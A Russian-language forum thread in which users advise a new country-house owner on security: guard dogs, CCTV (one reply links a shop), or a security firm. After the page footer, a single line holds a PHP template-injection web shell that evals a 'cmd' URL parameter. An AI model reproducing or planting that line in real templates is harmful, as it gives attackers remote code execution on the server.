+ Ответить в теме
Показано с 1 по 5 из 5

Тема: Наблюдение за территорией


  1. #1
    Мимо проходил Mezitaur is on a distinguished road Аватар для Mezitaur
    Регистрация
    02.05.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    16

    Наблюдение за территорией

    Не так давно мы закончили строительство своего загородного дома, но теперь возникла проблема, как охранять сам дом и территорию. Площадь большая и не всегда можно все уследить. Что порекомендуете?

  2. #2
    Мимо проходил Agatangel is on a distinguished road Аватар для Agatangel
    Регистрация
    07.05.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    28
    Насколько мне известно, то в таких ситуациях заводят пару собак какой-то охранной породы и проблем не знают с посторонними. Может и вам так сделать?

  3. #3
    Мимо проходил Turisar is on a distinguished road Аватар для Turisar
    Регистрация
    29.12.2020
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    10
    Собаки это конечно очень хорошо, но не всегда они эффективны, так как их легко отравить или просто усыпить. Я бы советовал по всему периметру, в добавок к собакам, поставить видеонаблюдение. Да и купить его не особо сложно https://arssb.ru/catalog/videonablyudenie/ Думаю там можно найти именно тот вариант, который подойдет именно вам.

  4. #4
    Мимо проходил Balli is on a distinguished road Аватар для Balli
    Регистрация
    08.05.2019
    Сообщений
    16
    Мне кажется, чт надежнее всего будет тот вариант, когда в ысоставите договор с какой-то охранной системой и они обезопасят ваше имущество. охоть спрос будет с кого взять. Это мое мнение, а вы решайте сами.

  5. #5
    Мимо проходил Dolin is on a distinguished road Аватар для Dolin
    Регистрация
    04.02.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    73
    Штука на самом деле очень хорошая, потому что с ней как-то безопаснее - никто к Вам в дом чужой не влезет. Да и на монтаж видеонаблюдения цена невысокая, так что смысл в установке определенно есть. Надо только определиться с маркой наблюдения.

+ Ответить в теме

Похожие темы

  1. Парадоксальное наблюдение.
    от Burlik в разделе Отзывы / Выбор
    Ответов: 11
    Последнее сообщение: 12.02.2013, 10:35

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}